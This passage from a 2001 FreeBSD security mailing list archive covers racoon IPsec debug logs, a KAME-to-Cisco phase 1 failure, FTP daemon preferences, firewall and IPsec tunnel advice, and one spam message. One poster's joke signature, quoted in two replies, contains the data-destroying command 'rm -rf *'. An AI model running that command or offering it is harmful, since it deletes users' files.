b6f0ce0c 028aacba b1b34248 44cc0b38 dda955d1 d8084d69 01971b07 9e87bab8 c0e72953 e18c22a8 d880e5de eb1eb23b e291890f 02ffd197 5c753de3 2bca8a85 d4924a54 bfb09edc 39bc8c00 a69c2a52 05000014 ac7ae33c 250a0483 75ed4d2c f8256442 0000000c 01110000 cbb9df13 2001-11-20 10:39:46: DEBUG: isakmp.c:233:isakmp_handler(): === 2001-11-20 10:39:46: DEBUG: isakmp.c:234:isakmp_handler(): 96 bytes message received from 203.2.2.1[500] 2001-11-20 10:39:46: DEBUG: plog.c:193:plogdump(): 91ee5662 24a1929d 19e865f5 b4290dd3 0b100500 00000000 00000060 00000044 00000001 0100000e 04000038 00000001 00000001 323b59e8 00000004 00000000 624c0f4c 611cf22c 00000001 00000000 612ccc00 00000000 01000000 00000000 2001-11-20 10:39:46: DEBUG: isakmp.c:2290:isakmp_printpacket(): begin. 2001-11-20 10:39:46: DEBUG: isakmp_inf.c:114:isakmp_info_recv(): receive Information. 2001-11-20 10:39:46: DEBUG: isakmp.c:1133:isakmp_parsewoh(): begin. 2001-11-20 10:39:46: DEBUG: isakmp.c:1160:isakmp_parsewoh(): seen nptype=11(notify) 2001-11-20 10:39:46: DEBUG: isakmp.c:1198:isakmp_parsewoh(): succeed. 2001-11-20 10:39:46: ERROR: isakmp_inf.c:769:isakmp_info_recv_n(): delete phase1 handle. 2001-11-20 10:39:46: ERROR: schedule.c:210:sched_scrub_param(): insanity schedule found. 2001-11-20 10:39:46: ERROR: isakmp_inf.c:792:isakmp_info_recv_n(): invalid spi_size in notification payload. 2001-11-20 10:39:46: DEBUG: isakmp_inf.c:797:isakmp_info_recv_n(): notification message 14:NO-PROPOSAL-CHOSEN, doi=1 proto_id=1 spi=(size=0). 2001-11-20 10:40:18: ERROR: isakmp.c:1818:isakmp_chkph1there(): phase2 negotiation failed due to time up waiting for phase1. ESP 203.2.2.1->203.1.1.1 2001-11-20 10:40:18: INFO: isakmp.c:1823:isakmp_chkph1there(): delete phase 2 handler. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 21:31:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id 6196137B416 for ; Tue, 20 Nov 2001 21:31:50 -0800 (PST) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.6/8.11.6) with ESMTP id fAL5Vkg52128; Wed, 21 Nov 2001 10:31:47 +0500 (YEKT) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.6/8.11.6) id fAL5VkZ02362; Wed, 21 Nov 2001 10:31:46 +0500 (YEKT) (envelope-from serg) Date: Wed, 21 Nov 2001 10:31:46 +0500 From: "Sergey N. Voronkov" To: Luc Cc: security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read Message-ID: <20011121103146.A2341@sv.tech.sibitex.tmn.ru> References: <5.1.0.14.2.20011120104126.02698ec0@netmail.home.com> <3BFA8C66.451F0835@2113.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3BFA8C66.451F0835@2113.ch>; from luc@2113.ch on Tue, Nov 20, 2001 at 06:01:26PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Nov 20, 2001 at 06:01:26PM +0100, Luc wrote: > Since everyone tell about its favorite FTPd, > here is mine: muddleftpd > http://www.arach.net.au/~wildfire/muddleftpd/ > > Muddleftpd is a new ftp server that can perform a variety of ftp tasks. > It is simple to setup, fast, secure and reasonably lightweight. I prefer lukemftpd. Pluses: 1) 4.4-Lite BSD based code. 2) Highly configurable. 3) Very stable. Mineses: 1) Hard to setup. 2) Extensive code maintainance (NetBSD). Serg N. Voronkov, Sibitex JSC. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 23:20:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id D207E37B41A for ; Tue, 20 Nov 2001 23:20:24 -0800 (PST) Received: from localhost ([3ffe:501:4819:eeea::6]) by mine.kame.net (8.11.1/3.7W) with ESMTP id fAL7Epa05348; Wed, 21 Nov 2001 16:14:51 +0900 (JST) To: ns@BlueSkyFrog.COM Cc: freebsd-security@freebsd.org Subject: Re: KAME IPsec <--> cisco In-Reply-To: Your message of "Wed, 21 Nov 2001 11:30:03 +1000" <20011121113003.A2610@BlueSkyFrog.COM> References: <20011121113003.A2610@BlueSkyFrog.COM> X-Mailer: Cue version 0.6 (011026-1440/sakane) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-Id: <20011121162028G.sakane@kame.net> Date: Wed, 21 Nov 2001 16:20:28 +0900 From: Shoichi Sakane X-Dispatcher: imput version 20000228(IM140) Lines: 30 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > As noted last week, phase 1 negotiation is not completing. However > I can't see what the problem is; all looks like it is set up > correctly to me. > The Cisco's config is like this (203.2.2.1): > crypto isakmp key **password** address 203.1.1.1 > > crypto map nolan 16 ipsec-isakmp > set peer 203.1.1.1 > set transform-set vodafone > set pfs group1 > match address 186 > > crypto ipsec transform-set vodafone esp-des esp-md5-hmac > > access-list 186 permit ip 203.2.2.0 0.0.0.255 host 203.1.1.2 did you check the phase1 configuration on the cisco ? i'm not sure the cisco configuration, but i think all of the above things are probably for phase 2. > When I try to contact 203.2.2.2 from 203.1.1.2, racoon logs the > following: > 2001-11-20 10:39:46: DEBUG: isakmp_inf.c:797:isakmp_info_recv_n(): notification message 14:NO-PROPOSAL-CHOSEN, doi=1 proto_id=1 spi=(size=0). > 2001-11-20 10:40:18: ERROR: isakmp.c:1818:isakmp_chkph1there(): phase2 negotiation failed due to time up waiting for phase1. ESP 203.2.2.1->203.1.1.1 the problem is that the cisco complained phase 1 proposal which racoon sent. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 2:21:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from highland.isltd.insignia.com (highland.isltd.insignia.com [195.74.141.1]) by hub.freebsd.org (Postfix) with ESMTP id 0CB7D37B405 for ; Wed, 21 Nov 2001 02:21:11 -0800 (PST) Received: from wolf.isltd.insignia.com (wolf.isltd.insignia.com [172.16.1.3]) by highland.isltd.insignia.com (8.11.3/8.11.3/check_local4.2) with ESMTP id fALAL4g52153 for ; Wed, 21 Nov 2001 10:21:04 GMT Received: (from news@localhost) by wolf.isltd.insignia.com (8.9.3/8.9.3) id KAA25201 for freebsd-security@freebsd.org; Wed, 21 Nov 2001 10:21:04 GMT From: freebsd-security-local@insignia.com To: freebsd-security@freebsd.org Subject: KAME IPSec <->Redcreek Date: Wed, 21 Nov 2001 10:21:04 +0000 Message-ID: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I wonder anyone has had success talking to a RedCreek Ravlin VPN gateway. I have some colleagues who are successfully using freeswan, but I'm having none at all with racoon. A packet trace shows the initial packet going to port 500 of the Ravlin, but no response. Unfortunately the Ravlin doesn't syslog anything at all in this situation, so it's kind of hard to debug! This is with the October snapshot from the ports. jim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 3:45:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from chaos.evolve.za.net (chaos.evolve.za.net [196.34.172.107]) by hub.freebsd.org (Postfix) with ESMTP id C467E37B405 for ; Wed, 21 Nov 2001 03:45:37 -0800 (PST) Received: from DAVE ([192.168.0.54]) by chaos.evolve.za.net (8.11.6/1.1.3) with SMTP id fALBjTl40861 for ; Wed, 21 Nov 2001 13:45:32 +0200 (SAST) (envelope-from dave@reason.za.org) Message-ID: <001701c17281$a021c580$3600a8c0@DAVE> From: "Dave Raven" To: References: <00c901c1721a$83fbfbd0$3531000a@shaw.ca> <20011121005417.A32244@default.eng.eircom.net> Subject: Re: Firewall products question Date: Wed, 21 Nov 2001 13:42:36 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org IP Filter has a webmin module aswell. http://www.wiejak.priv.pl/pub/Linux/system/admin/WebminModules/Ipf_admin.wbm ----- Original Message ----- From: "Dave Ryan" To: Sent: Wednesday, November 21, 2001 2:54 AM Subject: Re: Firewall products question > Laurence Brockman said the following on Tue, Nov 20, 2001 at 04:24:34PM -0700, > > Heya all, > > > > I'm looking for a product (Preferably open source) that is a firewall/vpn (Yes, I know this is all easily done in freebsd for the most part), and here's the kicker. It has to managed through a web interface. > > > > Any ideas? > > www.smoothwall.org > > -- > > Dave Ryan Security Advisor > dave.ryan@eircom.net Computer Incident Response Team > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 3:53:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from blue.blueskyfrog.com (blue.blueskyfrog.com [203.185.223.22]) by hub.freebsd.org (Postfix) with ESMTP id 80EEB37B405 for ; Wed, 21 Nov 2001 03:53:22 -0800 (PST) Received: from gold.internal.blueskyfrog.com ([192.168.121.34]) by blue.blueskyfrog.com with esmtp (Exim 3.12 #1 (Debian)) id 166Vti-0001kb-00; Wed, 21 Nov 2001 21:50:34 +1000 Received: from ns by gold.internal.blueskyfrog.com with local (Exim 3.12 #1 (Debian)) id 166Vti-0002kl-00; Wed, 21 Nov 2001 21:50:34 +1000 Date: Wed, 21 Nov 2001 21:50:34 +1000 From: Nick Slager To: Shoichi Sakane Cc: freebsd-security@freebsd.org Subject: Re: KAME IPsec <--> cisco Message-ID: <20011121215034.A10527@BlueSkyFrog.COM> References: <20011121113003.A2610@BlueSkyFrog.COM> <20011121162028G.sakane@kame.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011121162028G.sakane@kame.net>; from sakane@kame.net on Wed, Nov 21, 2001 at 04:20:28PM +0900 X-Homer: Whoohooooooo! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thus spake Shoichi Sakane (sakane@kame.net): > did you check the phase1 configuration on the cisco ? > i'm not sure the cisco configuration, but i think all of the above > things are probably for phase 2. OK, I will double check the cisco configuration. > the problem is that the cisco complained phase 1 proposal > which racoon sent. So the cisco router isn't happy with racoon's proposal, not the other way around. I wasn't sure on this. There definitely seem to be issues with the cisco config, which unfortunately isn't under my control. I will investigate. Thanks for your help, Nick -- Excuse of the day: It must have been the lightning storm we had yesterday To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 4:22: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from straylight.ringlet.net (sentinel.office1.bg [217.75.134.126]) by hub.freebsd.org (Postfix) with SMTP id C434437B416 for ; Wed, 21 Nov 2001 04:21:55 -0800 (PST) Received: (qmail 2582 invoked by uid 1000); 21 Nov 2001 12:21:11 -0000 Date: Wed, 21 Nov 2001 14:21:11 +0200 From: Peter Pentchev To: "Sergey N. Voronkov" Cc: Luc , security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read Message-ID: <20011121142111.A566@straylight.oblivion.bg> Mail-Followup-To: "Sergey N. Voronkov" , Luc , security@FreeBSD.ORG References: <5.1.0.14.2.20011120104126.02698ec0@netmail.home.com> <3BFA8C66.451F0835@2113.ch> <20011121103146.A2341@sv.tech.sibitex.tmn.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011121103146.A2341@sv.tech.sibitex.tmn.ru>; from serg@tmn.ru on Wed, Nov 21, 2001 at 10:31:46AM +0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Nov 21, 2001 at 10:31:46AM +0500, Sergey N. Voronkov wrote: > On Tue, Nov 20, 2001 at 06:01:26PM +0100, Luc wrote: > > Since everyone tell about its favorite FTPd, > > here is mine: muddleftpd > > http://www.arach.net.au/~wildfire/muddleftpd/ > > > > Muddleftpd is a new ftp server that can perform a variety of ftp tasks. > > It is simple to setup, fast, secure and reasonably lightweight. > > I prefer lukemftpd. > > Pluses: > 1) 4.4-Lite BSD based code. > 2) Highly configurable. > 3) Very stable. > > Mineses: > 1) Hard to setup. > 2) Extensive code maintainance (NetBSD). Maybe I'm missing something here, but how exactly is code maintenance a minus? :) G'luck, Peter -- "yields falsehood, when appended to its quotation." yields falsehood, when appended to its quotation. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 4:32:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id 9E57637B419 for ; Wed, 21 Nov 2001 04:32:45 -0800 (PST) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.6/8.11.6) with ESMTP id fALCWgL84890 for ; Wed, 21 Nov 2001 17:32:43 +0500 (YEKT) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.6/8.11.6) id fALCWga03637 for security@FreeBSD.ORG; Wed, 21 Nov 2001 17:32:42 +0500 (YEKT) (envelope-from serg) Date: Wed, 21 Nov 2001 17:32:42 +0500 From: "Sergey N. Voronkov" To: security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read Message-ID: <20011121173242.A3625@sv.tech.sibitex.tmn.ru> References: <5.1.0.14.2.20011120104126.02698ec0@netmail.home.com> <3BFA8C66.451F0835@2113.ch> <20011121103146.A2341@sv.tech.sibitex.tmn.ru> <20011121142111.A566@straylight.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011121142111.A566@straylight.oblivion.bg>; from roam@ringlet.net on Wed, Nov 21, 2001 at 02:21:11PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Nov 21, 2001 at 02:21:11PM +0200, Peter Pentchev wrote: > On Wed, Nov 21, 2001 at 10:31:46AM +0500, Sergey N. Voronkov wrote: > > On Tue, Nov 20, 2001 at 06:01:26PM +0100, Luc wrote: > > > Since everyone tell about its favorite FTPd, > > > here is mine: muddleftpd > > > http://www.arach.net.au/~wildfire/muddleftpd/ > > > > > > Muddleftpd is a new ftp server that can perform a variety of ftp tasks. > > > It is simple to setup, fast, secure and reasonably lightweight. > > > > I prefer lukemftpd. > > > > Pluses: > > 1) 4.4-Lite BSD based code. > > 2) Highly configurable. > > 3) Very stable. > > > > Mineses: > > 1) Hard to setup. > > 2) Extensive code maintainance (NetBSD). > > Maybe I'm missing something here, but how exactly is code maintenance > a minus? :) > Ooops! I meen s/Extensive/External/ ;-) And lukemftpd code is just a periodical "snapshot" of native NetBSD ftpd, as far as I know. (Just looking into http://www.freebsd.org/cgi/cvsweb.cgi/basesrc/libexec/ftpd/?cvsroot=netbsd ) I think it is a minus to this realy great ftp daemon. Best Regards, Serg N. Voronkov, Sibitex JSC. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 6:35:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from lunatic.oneinsane.net (lunatic.oneinsane.net [66.42.61.27]) by hub.freebsd.org (Postfix) with ESMTP id 4C26D37B405 for ; Wed, 21 Nov 2001 06:35:08 -0800 (PST) Received: by lunatic.oneinsane.net (Postfix, from userid 1000) id AE05D1550B; Wed, 21 Nov 2001 06:35:07 -0800 (PST) Date: Wed, 21 Nov 2001 06:35:07 -0800 From: Ron 'The InSaNe One' Rosson To: security@freebsd.org Subject: IPSec Tunnel Message-ID: <20011121063507.A6719@lunatic.oneinsane.net> Reply-To: Ron Rosson Mail-Followup-To: security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD lunatic.oneinsane.net 4.3-STABLE X-Moon: The Moon is Waxing Crescent (38% of Full) X-Opinion: What you read here is my IMHO X-WWW: http://www.oneinsane.net X-GPG-FINGERPRINT: 3F11 DB43 F080 C037 96F0 F8D3 5BD2 652B 171C 86DB X-Uptime: 6:34AM up 118 days, 37 mins, 2 users, load averages: 0.04, 0.02, 0.00 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Heya, Anyone know of any links on how to build an ipsec tunnel between an openbsd machine and a freebsd machine. Been working on it for 2 days now and everything I found is incomplete and does not work. TIA -- ------------------------------------------------------------------------------ Ron Rosson ... and a UNIX user said ... The InSaNe One rm -rf * insane@oneinsane.net and all was /dev/null and *void() ------------------------------------------------------------------------------ ...and that is how we know the Earth to be banana-shaped. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 6:54:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from chaos.evolve.za.net (chaos.evolve.za.net [196.34.172.107]) by hub.freebsd.org (Postfix) with ESMTP id 78A8137B405 for ; Wed, 21 Nov 2001 06:54:44 -0800 (PST) Received: from DAVE ([192.168.0.53]) by chaos.evolve.za.net (8.11.6/1.1.3) with SMTP id fALEsEl41970; Wed, 21 Nov 2001 16:54:20 +0200 (SAST) (envelope-from dave@raven.za.net) Message-ID: <001501c1729c$07264de0$3500a8c0@DAVE> From: "Dave Raven" To: "Ron Rosson" , References: <20011121063507.A6719@lunatic.oneinsane.net> Subject: Re: IPSec Tunnel Date: Wed, 21 Nov 2001 16:51:24 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A google search has come up with some decent looking ones. http://www.google.com/search?q=IPSec+Tunnel+On+FreeBSD http://www.daemonnews.org/200101/ipsec-howto.html http://www.mutex.org/aaron/tips/ipsec http://www.x-itec.de/projects/tuts/ipsec-howto.txt http://www.freebsddiary.org/ipsec-tunnel.php ----- Original Message ----- From: "Ron 'The InSaNe One' Rosson" To: Sent: Wednesday, November 21, 2001 4:35 PM Subject: IPSec Tunnel > Heya, > Anyone know of any links on how to build an ipsec tunnel between an > openbsd machine and a freebsd machine. > > Been working on it for 2 days now and everything I found is incomplete > and does not work. > > TIA > > -- > -------------------------------------------------------------------------- ---- > Ron Rosson ... and a UNIX user said ... > The InSaNe One rm -rf * > insane@oneinsane.net and all was /dev/null and *void() > -------------------------------------------------------------------------- ---- > ...and that is how we know the Earth to be banana-shaped. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 7:13:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from male.aldigital.co.uk (male.aldigital.co.uk [213.129.64.13]) by hub.freebsd.org (Postfix) with ESMTP id 6130A37B442 for ; Wed, 21 Nov 2001 07:13:04 -0800 (PST) Received: from algroup.co.uk (sockittome.aldigital.co.uk [194.128.162.252]) by male.aldigital.co.uk (Postfix) with ESMTP id 2ADCF6A142E; Wed, 21 Nov 2001 15:13:02 +0000 (GMT) Message-ID: <3BFBC47E.730FCBE5@algroup.co.uk> Date: Wed, 21 Nov 2001 15:13:02 +0000 From: Adam Laurie X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Ron Rosson Cc: security@freebsd.org Subject: Re: IPSec Tunnel References: <20011121063507.A6719@lunatic.oneinsane.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ron 'The InSaNe One' Rosson wrote: > > Heya, > Anyone know of any links on how to build an ipsec tunnel between an > openbsd machine and a freebsd machine. > > Been working on it for 2 days now and everything I found is incomplete > and does not work. many moons ago i wrote an install script for pipsecd that ensures you've got both ends set up correctly... not sure how out of date this now is, but for what it's worth: ftp://ftp.algroup.co.uk/pub/outgoing/pipsecconf.tgz "setup.sh" is the thing you want to look at first. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 The Stores http://www.thebunker.net 2 Bath Road http://www.aldigital.co.uk London W4 1LT mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 7:45:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from kumquat.mail.uk.easynet.net (kumquat.mail.uk.easynet.net [195.40.1.42]) by hub.freebsd.org (Postfix) with ESMTP id 7DB6F37B416 for ; Wed, 21 Nov 2001 07:45:15 -0800 (PST) Received: from magrat.office.easynet.net ([195.40.3.130]) by kumquat.mail.uk.easynet.net with esmtp (Exim 3.33 #1) id 166ZYi-0003vx-00; Wed, 21 Nov 2001 15:45:08 +0000 Received: by MAGRAT with Internet Mail Service (5.5.2653.19) id ; Wed, 21 Nov 2001 15:45:07 -0000 Message-ID: <7052044C7D7AD511A20200508B5A9C585169B1@MAGRAT> From: Lee Brotherston To: 'Ron Rosson' , security@freebsd.org Subject: RE: IPSec Tunnel Date: Wed, 21 Nov 2001 15:45:06 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There are a few ways. The easiest way I've found is to use mpd-netgraph. I must confess I'm not 100% sure if it is _actual_ IPSec, but it is IPSec like. It's a VPN-tunnel-on-demand daemon, it's part of the FreeBSD ports for an easy start point. I'm not sure how portable it is, so I can't say whether it would like OpenBSD, but being one of FreeBSD's closer relations is more likely work there than anywhere else ;) I've used it between a couple of FreeBSD boxes in a test environment using the PPTP with encryption option, and got it working properly with applications running over it and everything in less than an hour, so it's not too hard :) The other method I've seen is using the gif(n) interface.... 'man setkey' explains it better than I could ;) Thanks Lee -- Lee Brotherston - IP Security Manager, Easynet Ltd http://www.easynet.net/ Phone: +44 20 7900 4444 | -----Original Message----- | From: Ron 'The InSaNe One' Rosson | [mailto:insane@lunatic.oneinsane.net] | Sent: 21 November 2001 14:35 | To: security@freebsd.org | Subject: IPSec Tunnel | | | Heya, | Anyone know of any links on how to build an ipsec tunnel between an | openbsd machine and a freebsd machine. | | Been working on it for 2 days now and everything I found is | incomplete | and does not work. | | TIA | | -- | -------------------------------------------------------------- | ---------------- | Ron Rosson ... and a UNIX | user said ... | The InSaNe One rm -rf * | insane@oneinsane.net and all was | /dev/null and *void() | -------------------------------------------------------------- | ---------------- | ...and that is how we know the Earth to be banana-shaped. | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-security" in the body of the message | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 7:52:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from spider10.spiderwebhost.net (spider10.spiderwebhost.net [64.95.69.17]) by hub.freebsd.org (Postfix) with ESMTP id 4D95B37B41D for ; Wed, 21 Nov 2001 07:51:51 -0800 (PST) Received: from T23 (dhcp065-029-083-246.indy.rr.com [65.29.83.246]) by spider10.spiderwebhost.net (8.9.3/8.9.3) with SMTP id KAA17753 for ; Wed, 21 Nov 2001 10:51:50 -0500 Message-Id: <200111211551.KAA17753@spider10.spiderwebhost.net> Date: Wed, 21 Nov 2001 10:51:34 -0500 From: "Steven M. Seltzer" Subject: New Dental Practice Philosophy To: "freebsd-security@freebsd.org" Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I would like to wish you a very Happy Thanksgiving! We recently created a one page practice philosophy statement that emphasizes = teamwork, caring, helping others, and developing your full potential by = assuming a more active role in the practice. =20 This philosophy is designed specifically for updating skills in the practice to = utilize technology tools that improve productivity and efficiency. If you would like to receive this philosophy statement with my compliments, = please reply to this e-mail with your name, address, and e-mail address where = you would like the philosophy sent. If you prefer not to receive future technology and practice management updates = like this one, please reply to this message and type, "remove" in the subject = line. Thank you. Best regards, Steve Seltzer www.hitecdentist.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 8:34:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsas1i.audiotel.com.ar (host030038.prima.com.ar [200.42.30.38]) by hub.freebsd.org (Postfix) with ESMTP id B623137B416 for ; Wed, 21 Nov 2001 08:34:51 -0800 (PST) Received: from audi2k (audi2k.audiotel.com.ar [192.168.100.237]) (authenticated) by bsas1i.audiotel.com.ar (8.11.6/8.11.6) with ESMTP id fALGYit29122 for ; Wed, 21 Nov 2001 13:34:44 -0300 (ART) From: "Fernando Germano" To: Subject: Best security topology for FreeBSD Date: Wed, 21 Nov 2001 13:35:18 -0300 Message-ID: <00ca01c172aa$814c90d0$ed64a8c0@audi2k> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Could please help me? I'm about to install a FreeBSD 4.4 box with some firewall and I need to know wich one of the freeware firewalls product is the best (IPFW, IPFilter, etc), or maybe if you could recomend me a good solution for this situation: FreeBSD box = firewall with 10 NICs NIC 1 -> DMZ NIC 2 -> Internet NIC 3 -> Partner network . . NIC 8 -> Partner network NIC 9 -> Internal network NIC 10 -> Internal network Well, this is it, i need a good firewall + NAT solution, could please help me?? Thanks in advice Fernando PD: Sorry if this message is kind of "off-topic", is this is the case please answer directly to my private address, thank you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 8:49:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from kumquat.mail.uk.easynet.net (kumquat.mail.uk.easynet.net [195.40.1.42]) by hub.freebsd.org (Postfix) with ESMTP id EAE9937B42B for ; Wed, 21 Nov 2001 08:49:35 -0800 (PST) Received: from magrat.office.easynet.net ([195.40.3.130]) by kumquat.mail.uk.easynet.net with esmtp (Exim 3.33 #1) id 166aYz-0004ux-00; Wed, 21 Nov 2001 16:49:29 +0000 Received: by MAGRAT with Internet Mail Service (5.5.2653.19) id ; Wed, 21 Nov 2001 16:49:25 -0000 Message-ID: <7052044C7D7AD511A20200508B5A9C585169B6@MAGRAT> From: Lee Brotherston To: 'Fernando Germano' , security@FreeBSD.ORG Subject: RE: Best security topology for FreeBSD Date: 